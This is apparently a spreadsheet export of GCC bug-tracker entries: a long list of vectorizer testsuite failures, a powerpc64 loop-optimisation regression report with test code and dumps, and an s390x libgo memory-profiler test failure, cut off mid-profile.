FAIL: gcc.dg/vect/slp-12a.c (internal compiler error)
FAIL: gcc.dg/vect/slp-12a.c (test for excess errors)
FAIL: gcc.dg/vect/slp-12a.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-12a.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-12c.c (internal compiler error)
FAIL: gcc.dg/vect/slp-12c.c (test for excess errors)
FAIL: gcc.dg/vect/slp-12c.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-12c.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-13.c (internal compiler error)
FAIL: gcc.dg/vect/slp-13.c (test for excess errors)
FAIL: gcc.dg/vect/slp-13.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-13.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-18.c (internal compiler error)
FAIL: gcc.dg/vect/slp-18.c (test for excess errors)
FAIL: gcc.dg/vect/slp-18.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-18.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-19a.c (internal compiler error)
FAIL: gcc.dg/vect/slp-19a.c (test for excess errors)
FAIL: gcc.dg/vect/slp-19a.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-19a.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-19b.c (internal compiler error)
FAIL: gcc.dg/vect/slp-19b.c (test for excess errors)
FAIL: gcc.dg/vect/slp-19b.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-19b.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-19c.c (internal compiler error)
FAIL: gcc.dg/vect/slp-19c.c (test for excess errors)
FAIL: gcc.dg/vect/slp-19c.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-19c.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-26.c (internal compiler error)
FAIL: gcc.dg/vect/slp-26.c (test for excess errors)
FAIL: gcc.dg/vect/slp-26.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-26.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-33.c (internal compiler error)
FAIL: gcc.dg/vect/slp-33.c (test for excess errors)
FAIL: gcc.dg/vect/slp-33.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-33.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-4.c (internal compiler error)
FAIL: gcc.dg/vect/slp-4.c (test for excess errors)
FAIL: gcc.dg/vect/slp-4.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-4.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-5.c (internal compiler error)
FAIL: gcc.dg/vect/slp-5.c (test for excess errors)
FAIL: gcc.dg/vect/slp-5.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-5.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-1.c (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-1.c (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-1.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-1.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-2.c (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-2.c (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-2.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-2.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-3.c (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-3.c (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-3.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-3.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-4.c (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-4.c (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-4.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-4.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-5.c (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-5.c (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-5.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-5.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-6.c (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-6.c (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-6.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-6.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-7.c (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-7.c (test for excess errors)
FAIL: gcc.dg/vect/slp-perm-7.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/slp-perm-7.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/trapv-vect-reduc-4.c (internal compiler error)
FAIL: gcc.dg/vect/trapv-vect-reduc-4.c (test for excess errors)
FAIL: gcc.dg/vect/vect-10.c (internal compiler error)
FAIL: gcc.dg/vect/vect-10.c (test for excess errors)
FAIL: gcc.dg/vect/vect-10.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-10.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-100.c (internal compiler error)
FAIL: gcc.dg/vect/vect-100.c (test for excess errors)
FAIL: gcc.dg/vect/vect-100.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-100.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-110.c (internal compiler error)
FAIL: gcc.dg/vect/vect-110.c (test for excess errors)
FAIL: gcc.dg/vect/vect-110.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-110.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-114.c (internal compiler error)
FAIL: gcc.dg/vect/vect-114.c (test for excess errors)
FAIL: gcc.dg/vect/vect-114.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-114.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-12.c (internal compiler error)
FAIL: gcc.dg/vect/vect-12.c (test for excess errors)
FAIL: gcc.dg/vect/vect-12.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-12.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-15.c (internal compiler error)
FAIL: gcc.dg/vect/vect-15.c (test for excess errors)
FAIL: gcc.dg/vect/vect-15.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-15.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-23.c (internal compiler error)
FAIL: gcc.dg/vect/vect-23.c (test for excess errors)
FAIL: gcc.dg/vect/vect-23.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-23.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-24.c (internal compiler error)
FAIL: gcc.dg/vect/vect-24.c (test for excess errors)
FAIL: gcc.dg/vect/vect-24.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-24.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-62.c (internal compiler error)
FAIL: gcc.dg/vect/vect-62.c (test for excess errors)
FAIL: gcc.dg/vect/vect-62.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-62.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-63.c (internal compiler error)
FAIL: gcc.dg/vect/vect-63.c (test for excess errors)
FAIL: gcc.dg/vect/vect-63.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-63.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-65.c (internal compiler error)
FAIL: gcc.dg/vect/vect-65.c (test for excess errors)
FAIL: gcc.dg/vect/vect-65.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-65.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-71.c (internal compiler error)
FAIL: gcc.dg/vect/vect-71.c (test for excess errors)
FAIL: gcc.dg/vect/vect-71.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-71.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-98.c (internal compiler error)
FAIL: gcc.dg/vect/vect-98.c (test for excess errors)
FAIL: gcc.dg/vect/vect-98.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-98.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-float-truncate-1.c (internal compiler error)
FAIL: gcc.dg/vect/vect-float-truncate-1.c (test for excess errors)
FAIL: gcc.dg/vect/vect-float-truncate-1.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-float-truncate-1.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-floatint-conversion-2.c (internal compiler error)
FAIL: gcc.dg/vect/vect-floatint-conversion-2.c (test for excess errors)
FAIL: gcc.dg/vect/vect-floatint-conversion-2.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-floatint-conversion-2.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-outer-5.c (internal compiler error)
FAIL: gcc.dg/vect/vect-outer-5.c (test for excess errors)
FAIL: gcc.dg/vect/vect-outer-5.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-outer-5.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-reduc-2char.c (internal compiler error)
FAIL: gcc.dg/vect/vect-reduc-2char.c (test for excess errors)
FAIL: gcc.dg/vect/vect-reduc-2char.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-reduc-2char.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-reduc-2short.c (internal compiler error)
FAIL: gcc.dg/vect/vect-reduc-2short.c (test for excess errors)
FAIL: gcc.dg/vect/vect-reduc-2short.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-reduc-2short.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-reduc-6.c (internal compiler error)
FAIL: gcc.dg/vect/vect-reduc-6.c (test for excess errors)
FAIL: gcc.dg/vect/vect-reduc-6.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-reduc-6.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.dg/vect/vect-strided-store.c (internal compiler error)
FAIL: gcc.dg/vect/vect-strided-store.c (test for excess errors)
FAIL: gcc.dg/vect/vect-strided-store.c -flto -ffat-lto-objects (internal compiler error)
FAIL: gcc.dg/vect/vect-strided-store.c -flto -ffat-lto-objects (test for excess errors)
FAIL: gcc.target/powerpc/pr58673-2.c (internal compiler error)
FAIL: gcc.target/powerpc/pr58673-2.c (test for excess errors)
FAIL: gcc.target/powerpc/swaps-p8-1.c (internal compiler error)
FAIL: gcc.target/powerpc/swaps-p8-1.c (test for excess errors)
FAIL: gcc.target/powerpc/swaps-p8-6.c (internal compiler error)
FAIL: gcc.target/powerpc/swaps-p8-6.c (test for excess errors)</t>
  </si>
  <si>
    <t>GCC-18650</t>
  </si>
  <si>
    <t>[4.0 Regression] Failure in tree-ssa/loop-2.c with powerpc64 with biarch</t>
  </si>
  <si>
    <t>I didn't find a bug report for this yet.
This regressoin roughly started happening Oct 26-27. as it shows up in
testresults from Janis Johson here.  (32-bit default32 compiler.  Regression
only at -m64)
http://gcc.gnu.org/ml/gcc-testresults/2004-10/msg01382.html
Interestingly this also shows up in my 64-bit default64 compiler but at -m32:
http://gcc.gnu.org/ml/gcc-testresults/2004-10/msg01391.html
The check that is failing in the test case is:
  /* { dg-final { scan-tree-dump-times  \\* 17 0 vars } } */
  /* { dg-final { scan-tree-dump-times  \\+ 17 1 vars } } */
as 17 * iter is not getting reduced.
I played with the testcase a bit using a 32-bit biarch compiler w/ -m64 and
noticed a couple things.
1) Changing the iter var from 'int' to a 'long' seems to let the test pass again
.  The test case is tiny so I'll original code here:
struct bla
{
  char x[187]
  int y
  char z[253]
} arr_base[100]
void xxx(void)
{
  int  iter
  for (iter = 0 iter &lt; 100 iter++)
    arr_base[iter].y = 17 * iter
}
2) Dumps of t52.ivopts pass (from dump-tree-all-all) look funny:
(add_to_evolution
  (loop_nb = 1)
  (chrec_before = 100)
  (to_add = 1)
  (res = {100 + 4294967295}_1))
  (evolution_function = {100 + 4294967295}_1))
(set_scalar_evolution
  (scalar = ivtmp.1_5)
  (scalar_evolution = {100 + 4294967295}_1))
)
as 4294967295 looks quite peculiar.and would have expected 0 there.   
I'll attach the entire loop-2.c.t52.ivopts for 32 bit and for 64 bit in case
someone wise in the ways of tree/loops/scalarev has interest.</t>
  </si>
  <si>
    <t>jgrimm2</t>
  </si>
  <si>
    <t>GCC-64999</t>
  </si>
  <si>
    <t>s390x libgo test failure in TestMemoryProfiler</t>
  </si>
  <si>
    <t>With the current trunk I get a test failure in the runtime/pprof test.  I'll start investigating what's going on now but wanted to report it beforehand.  Any hints on debugging this?
--
$ make -k check-go RUNTESTFLAGS=go-test.exp
...
--- FAIL: TestMemoryProfiler (0.16s)
	testing.go:278: The entry did not match:
		32: 1024 \[32: 1024\] @ 0x[0-9a-f x]+
		#	0x[0-9a-f]+	pprof_test\.allocatePersistent1K\+0x[0-9a-f]+	.*/mprof_test\.go:43
		#	0x[0-9a-f]+	runtime_pprof_test\.TestMemoryProfiler\+0x[0-9a-f]+	.*/mprof_test\.go:66
		Profile:
		heap profile: 37: 3544 [3111: 4229640] @ heap/2
		1: 1408 [1: 1408] @ 0x800250a9 0x800250a9 0x8001e5c7 0x8001e5c7 0x80021d3f 0x8001bf73 0x8001d54b 0x800069b1 0x3fff74ac92b 0x80006a15
		#	0x8001bf73	mcommoninit+0x93	../../../libgo/runtime/proc.c:739
		#	0x8001d54b	runtime_schedinit+0x8b	../../../libgo/runtime/proc.c:459
		#	0x800069b1	main+0x31		../../../libgo/runtime/go-main.c:40
		#	0x3fff74ac92b
		#	0x80006a15
		1: 1024 [1024: 1048576] @ 0x800250a9 0x800250a9 0x8001163f 0x80011687 0x8000c551 0x800ad279 0x8001e229
		#	0x800ad279	testing.$thunk15+0xc9	../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41		../../../libgo/runtime/proc.c:235
		32: 1024 [32: 1024] @ 0x800250a9 0x800250a9 0x8000c44b 0x8000c595 0x800ad279 0x8001e229
		#	0x8000c44b	pprof_test.allocatePersistent1K+0x23	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:43
		#	0x8000c595	runtime_pprof_test.TestMemoryProfiler+0x11d	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:65
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		1: 64 [1: 64] @ 0x800250a9 0x800250a9 0x8001134d 0x8000c533 0x800ad279 0x8001e229
		#	0x800ad279	testing.$thunk15+0xc9	../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41		../../../libgo/runtime/proc.c:235
		1: 16 [1: 16] @ 0x800250a9 0x800250a9 0x8000c4df 0x800ad279 0x8001e229
		#	0x800ad279	testing.$thunk15+0xc9	../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41		../../../libgo/runtime/proc.c:235
		1: 8 [1: 8] @ 0x800250a9 0x800250a9 0x8000c50f 0x800ad279 0x8001e229
		#	0x800ad279	testing.$thunk15+0xc9	../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41		../../../libgo/runtime/proc.c:235
		0: 0 [0: 0] @ 0x800250a9 0x800250a9 0x8000c5bb 0x800ad279 0x8001e229
		#	0x800ad279	testing.$thunk15+0xc9	../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41		../../../libgo/runtime/proc.c:235
		0: 0 [1: 32] @ 0x800250a9 0x800250a9 0x8000c3b7 0x8000c58f 0x800ad279 0x8001e229
		#	0x8000c3b7	pprof_test.allocateTransient2M+0x47	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:30
		#	0x8000c58f	runtime_pprof_test.TestMemoryProfiler+0x117	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:64
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		0: 0 [1: 2097152] @ 0x800250a9 0x800250a9 0x8001163f 0x80011687 0x8000c3a7 0x8000c58f 0x800ad279 0x8001e229
		#	0x8000c3a7	pprof_test.allocateTransient2M+0x37	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:30
		#	0x8000c58f	runtime_pprof_test.TestMemoryProfiler+0x117	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:64
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		0: 0 [1024: 1048576] @ 0x800250a9 0x800250a9 0x8000c32b 0x8000c589 0x800ad279 0x8001e229
		#	0x8000c32b	pprof_test.allocateTransient1M+0x23	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:21
		#	0x8000c589	runtime_pprof_test.TestMemoryProfiler+0x111	/home/vogt/src/git/gcc/build-go/s390x-ibm-linux-gnu/libgo/gotest81795/test/mprof_test.go:59
		#	0x800ad279	testing.$thunk15+0xc9			../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41				../../../libgo/runtime/proc.c:235
		0: 0 [1024: 32768] @ 0x800250a9 0x800250a9 0x8000c561 0x800ad279 0x8001e229
		#	0x800ad279	testing.$thunk15+0xc9	../../../libgo/go/testing/testing.go:555
		#	0x8001e229	kickoff+0x41		../../../libgo/runtime/proc.c:235
		0: 0 [1: 16] @ 0x800250a9 0x800250a9 0x80025b41 0x80025b41 0x8001d531 0x800069b1 0x3fff74ac92b 0x80006a15
		#	0x800069b1	main+0x31	../../../libgo/run